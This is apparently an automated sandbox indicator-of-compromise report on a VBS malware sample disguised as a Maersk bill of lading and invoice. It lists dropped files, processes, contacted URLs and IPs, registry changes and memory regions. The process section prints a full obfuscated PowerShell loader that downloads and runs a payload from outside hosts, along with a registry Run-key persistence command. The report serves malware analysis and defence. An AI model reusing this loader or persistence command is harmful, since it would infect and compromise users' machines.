IOC Report
Maersk_BL_Invoice_Packinglist.vbs

loading gif

Files

File Path
Type
Category
Malicious
Maersk_BL_Invoice_Packinglist.vbs
ASCII text, with very long lines (2004), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\kpburtts.dat
data
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h45yca3z.n0i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it3jblhk.1tt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgmxergi.2iy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywes52nc.utm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Scabrosely.Tor
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"

URLs

Name
IP
Malicious
janbours92harbu02.duckdns.org
malicious
https://contemega.com.do/Outgassed.
unknown
http://103.19
unknown
http://103.195.237.43/Outgassed.em
unknown
https://contemega.com.do/Ou
unknown
https://contemega.com.d
unknown
http://103.195.
unknown
https://contemega.com.do/O
unknown
https://contemega.c
unknown
https://contoso.com/License
unknown
https://contemega.com.do/Outgass
unknown
https://contemega.com.do
unknown
http://103.195.237.43/Outga
unknown
https://contemega.com.do/Outgasse
unknown
http://103.195.237.43/Outgassed.emz
unknown
https://contemega.com.do/Out
unknown
http://103.195.237.43/Outg
unknown
https://contemega.com.do/
unknown
http://103.195.237.4
unknown
http://103.195.237.43/QJqDH201.bin
103.195.237.43
https://contemega.com.do/Outgassed.em
unknown
http://103.195.237.43/Outgas
unknown
https://aka.ms/pscore6lB
unknown
https://contemega.com.do/Outgas
unknown
https://contemega.com.do/Outgassed.e
unknown
http://103.1
unknown
https://contemega.com.do/Outgassed.emz
192.185.112.252
http://103.195.237.43/QJqDH201.binEyessVescontemega.com.do/QJqDH201.bin
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://103.195
unknown
http://103.195.237.
unknown
https://contemega.com.
unknown
http://103.195.237.43
unknown
http://103.195.237.43/QJqDH201.binTq
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contemega.co
unknown
https://contemega.P
unknown
http://103.195.237.43/Outgassed.emzX
unknown
http://nuget.org/NuGet.exe
unknown
https://contemega.com.do/Outga
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://103.195.237.43/Ou
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://103.195.237.43/Outgasse
unknown
http://103.195.237.43/QJqDH201.binV
unknown
https://contoso.com/Icon
unknown
http://103.195.237
unknown
http://103.195.237.43/Out
unknown
https://contemega.com.do/Outg
unknown
http://103.195.237.43/Outgass
unknown
https://github.com/Pester/Pester
unknown
http://103.195.237.43/O
unknown
http://103.195.23
unknown
http://contemega.com.do
unknown
http://103.195.237.43/Outgassed.
unknown
http://103.195.237.43/;
unknown
http://103.195.2
unknown
http://103.195.237.43/
unknown
https://aka.ms/pscore68
unknown
https://contemega.com.do/Outgassed
unknown
https://contemega.com
unknown
http://103.195.237.43/Outgassed.e
unknown
http://103.195.237.43/Outgassed
unknown
There are 55 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
janbours92harbu02.duckdns.org
206.123.148.198
malicious
janbours92harbu03.duckdns.org
unknown
malicious
contemega.com.do
192.185.112.252

IPs

IP
Domain
Country
Malicious
206.123.148.198
janbours92harbu02.duckdns.org
United States
malicious
103.195.237.43
unknown
Viet Nam
192.185.112.252
contemega.com.do
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Pardo
Krecar
HKEY_CURRENT_USER\Environment
Salvings
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
exepath
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
licence
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-DMPW3B
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Startup key
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5FB4000
heap
page read and write
malicious
5192000
remote allocation
page execute and read and write
malicious
A152000
direct allocation
page execute and read and write
malicious
1816856F000
heap
page read and write
17022EC3000
trusted library allocation
page read and write
7FFD9B942000
trusted library allocation
page read and write
1816A4F8000
heap
page read and write
1816A457000
heap
page read and write
1816A4F2000
heap
page read and write
1816856F000
heap
page read and write
2E00000
heap
page read and write
73AD000
stack
page read and write
1703B045000
heap
page read and write
1816A4CD000
heap
page read and write
1816A4B2000
heap
page read and write
1816872E000
heap
page read and write
7E87000
stack
page read and write
34FE000
stack
page read and write
170228C0000
heap
page read and write
74FB000
stack
page read and write
181685C1000
heap
page read and write
597000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
25ED000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1816A4FF000
heap
page read and write
1816A33F000
heap
page read and write
17021010000
heap
page read and write
6B20000
direct allocation
page read and write
1816A659000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9B816000
trusted library allocation
page read and write
32E0000
heap
page read and write
21C0D000
stack
page read and write
1816A524000
heap
page read and write
3D92000
remote allocation
page execute and read and write
2EB0000
heap
page read and write
1816A4E7000
heap
page read and write
17020D30000
heap
page read and write
557B07E000
stack
page read and write
1702487C000
trusted library allocation
page read and write
1816872A000
heap
page read and write
293C000
heap
page read and write
ABE000
stack
page read and write
8510000
trusted library allocation
page execute and read and write
17024804000
trusted library allocation
page read and write
1816A4EC000
heap
page read and write
2175E000
stack
page read and write
21110000
direct allocation
page read and write
1816A4C8000
heap
page read and write
1816A350000
heap
page read and write
8490000
trusted library allocation
page read and write
170227C0000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
5631000
trusted library allocation
page read and write
181684FF000
heap
page read and write
5641000
trusted library allocation
page read and write
501C5FC000
stack
page read and write
170227F0000
trusted library allocation
page read and write
170242A9000
trusted library allocation
page read and write
17020EEC000
heap
page read and write
2B8E000
unkown
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1816A5D1000
heap
page read and write
21B8C000
stack
page read and write
AB52000
direct allocation
page execute and read and write
170247CF000
trusted library allocation
page read and write
17021015000
heap
page read and write
1816A5FE000
heap
page read and write
7440000
trusted library allocation
page read and write
181685B2000
heap
page read and write
1703AEC7000
heap
page execute and read and write
21870000
direct allocation
page read and write
1816A49C000
heap
page read and write
2A50000
heap
page read and write
21E30000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1816A359000
heap
page read and write
17022A01000
trusted library allocation
page read and write
17023240000
trusted library allocation
page read and write
70D1000
heap
page read and write
70E2000
heap
page read and write
1816A49C000
heap
page read and write
1703B042000
heap
page read and write
CD0000
heap
page read and write
1703AD40000
heap
page read and write
2A60000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
21CD0000
heap
page read and write
18168728000
heap
page read and write
84A0000
direct allocation
page execute and read and write
7FFD9B880000
trusted library allocation
page execute and read and write
1816A353000
heap
page read and write
1816A33A000
heap
page read and write
1816A581000
heap
page read and write
81E6000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
17020F5D000
heap
page read and write
17020FF0000
trusted library allocation
page read and write
18168583000
heap
page read and write
17020E6B000
heap
page read and write
170248FC000
trusted library allocation
page read and write
1816A483000
heap
page read and write
2DB0000
heap
page read and write
1816A359000
heap
page read and write
210B0000
direct allocation
page read and write
1816A47F000
heap
page read and write
1816A4B0000
heap
page read and write
7240000
trusted library allocation
page read and write
6A6F000
stack
page read and write
2C8F000
unkown
page read and write
18168591000
heap
page read and write
1703AEC0000
heap
page execute and read and write
1816A331000
heap
page read and write
27A0000
heap
page read and write
1816A4F2000
heap
page read and write
170247EE000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
81E0000
heap
page read and write
181685B2000
heap
page read and write
B3E000
stack
page read and write
74A0000
trusted library allocation
page read and write
1816A51F000
heap
page read and write
952000
heap
page read and write
44A8000
trusted library allocation
page read and write
2FAD000
stack
page read and write
21860000
direct allocation
page read and write
27A5000
heap
page read and write
6180000
direct allocation
page read and write
6BB0000
direct allocation
page read and write
6150000
direct allocation
page read and write
81F6000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1816A4CD000
heap
page read and write
860000
heap
page read and write
1816A441000
heap
page read and write
17020EC3000
heap
page read and write
17020EA3000
heap
page read and write
170247CA000
trusted library allocation
page read and write
5F38000
heap
page read and write
1816A504000
heap
page read and write
71FFFFF000
stack
page read and write
170229F0000
heap
page execute and read and write
2A70000
heap
page read and write
F80000
heap
page readonly
F24000
trusted library allocation
page read and write
18168588000
heap
page read and write
7490000
trusted library allocation
page read and write
3290000
heap
page read and write
1816A4B0000
heap
page read and write
8D52000
direct allocation
page execute and read and write
85E000
stack
page read and write
1816A468000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
6190000
direct allocation
page read and write
17020EF1000
heap
page read and write
17023230000
trusted library allocation
page read and write
1816A376000
heap
page read and write
18168728000
heap
page read and write
7290000
trusted library allocation
page read and write
1816A4EB000
heap
page read and write
7FA80000
trusted library allocation
page execute and read and write
1816A440000
heap
page read and write
1816855D000
heap
page read and write
1816A348000
heap
page read and write
81CC000
heap
page read and write
1816A4F2000
heap
page read and write
28FD000
stack
page read and write
1816A4F2000
heap
page read and write
18168720000
heap
page read and write
27D0000
heap
page read and write
2FED000
stack
page read and write
F52000
trusted library allocation
page read and write
1816A4E6000
heap
page read and write
18168500000
heap
page read and write
6AE0000
direct allocation
page read and write
6E8E000
stack
page read and write
1816A4B0000
heap
page read and write
1816872E000
heap
page read and write
21C4E000
stack
page read and write
21A8E000
stack
page read and write
8C20000
direct allocation
page execute and read and write
557AD5E000
stack
page read and write
1816A525000
heap
page read and write
2524FBB5000
heap
page read and write
1816A474000
heap
page read and write
F2D000
trusted library allocation
page execute and read and write
F23000
trusted library allocation
page execute and read and write
F90000
heap
page read and write
1816A441000
heap
page read and write
2CCE000
stack
page read and write
21850000
direct allocation
page read and write
453E000
stack
page read and write
210C0000
direct allocation
page read and write
21080000
direct allocation
page read and write
2524FBC0000
heap
page read and write
81BC000
stack
page read and write
705B000
heap
page read and write
218FF000
stack
page read and write
17022A82000
trusted library allocation
page read and write
275E000
stack
page read and write
323F000
stack
page read and write
2DCF000
stack
page read and write
1703B07E000
heap
page read and write
8077000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
170247E1000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
557AD9E000
stack
page read and write
7FFD9B760000
trusted library allocation
page read and write
17020E10000
heap
page read and write
1816A4B0000
heap
page read and write
1816A33F000
heap
page read and write
88B000
heap
page read and write
217ED000
stack
page read and write
7450000
trusted library allocation
page read and write
17023077000
trusted library allocation
page read and write
6160000
direct allocation
page read and write
1816A4CD000
heap
page read and write
1703AD45000
heap
page read and write
1816851B000
heap
page read and write
F00000
trusted library section
page read and write
8BC000
heap
page read and write
17032A72000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
95C000
heap
page read and write
1816A474000
heap
page read and write
7035000
heap
page read and write
1816872D000
heap
page read and write
7FFD9B911000
trusted library allocation
page read and write
1816A4E6000
heap
page read and write
17020E76000
heap
page read and write
4550000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
181684A0000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
6B30000
direct allocation
page read and write
F55000
trusted library allocation
page execute and read and write
7FFD9B810000
trusted library allocation
page read and write
2DFE000
stack
page read and write
21C8E000
stack
page read and write
501CAFB000
stack
page read and write
2179F000
stack
page read and write
72EE000
stack
page read and write
7DF40FC50000
trusted library allocation
page execute and read and write
1816A4C3000
heap
page read and write
2952000
heap
page read and write
732F000
stack
page read and write
44FC000
stack
page read and write
7079000
heap
page read and write
1816A33F000
heap
page read and write
1816A4B2000
heap
page read and write
215DE000
stack
page read and write
6BA0000
direct allocation
page read and write
60AE000
stack
page read and write
557B7BB000
stack
page read and write
60ED000
stack
page read and write
1816A4C3000
heap
page read and write
1816856F000
heap
page read and write
170231F9000
trusted library allocation
page read and write
1816A33F000
heap
page read and write
557B27E000
stack
page read and write
557B6BE000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
557C28B000
stack
page read and write
1816A34B000
heap
page read and write
501C6FB000
stack
page read and write
18168534000
heap
page read and write
1816850E000
heap
page read and write
5659000
trusted library allocation
page read and write
612E000
stack
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1816A4B4000
heap
page read and write
17023207000
trusted library allocation
page read and write
2524F8E0000
heap
page read and write
2524FBB0000
heap
page read and write
1816A4F5000
heap
page read and write
7470000
trusted library allocation
page read and write
1816A4C3000
heap
page read and write
7230000
trusted library allocation
page read and write
1816857A000
heap
page read and write
7FFD9B762000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
55C000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1816A560000
remote allocation
page read and write
45FE000
stack
page read and write
1816A4FD000
heap
page read and write
45BE000
stack
page read and write
4570000
heap
page execute and read and write
214D0000
heap
page read and write
17020FD0000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
6B40000
direct allocation
page read and write
1816A359000
heap
page read and write
1816A4B4000
heap
page read and write
210F0000
direct allocation
page read and write
6B10000
direct allocation
page read and write
181685C1000
heap
page read and write
17020EC6000
heap
page read and write
1816A33C000
heap
page read and write
69EF000
stack
page read and write
17022EB6000
trusted library allocation
page read and write
1816A5FF000
heap
page read and write
1816A4B0000
heap
page read and write
1816A468000
heap
page read and write
1816A560000
remote allocation
page read and write
1702315B000
trusted library allocation
page read and write
1816A45B000
heap
page read and write
181684FB000
heap
page read and write
7480000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
4631000
trusted library allocation
page read and write
6AD5000
heap
page execute and read and write
7097000
heap
page read and write
1816A657000
heap
page read and write
1703B0AE000
heap
page read and write
6AF0000
direct allocation
page read and write
17022EC7000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
449E000
stack
page read and write
7F10000
heap
page read and write
990000
trusted library section
page read and write
1703B280000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
17020E60000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1703AE17000
heap
page read and write
7250000
trusted library allocation
page read and write
1816A4C3000
heap
page read and write
6140000
direct allocation
page read and write
1816A33F000
heap
page read and write
1816A359000
heap
page read and write
8015000
trusted library allocation
page read and write
210D0000
direct allocation
page read and write
4688000
trusted library allocation
page read and write
1816A4CA000
heap
page read and write
17020EA9000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1816851B000
heap
page read and write
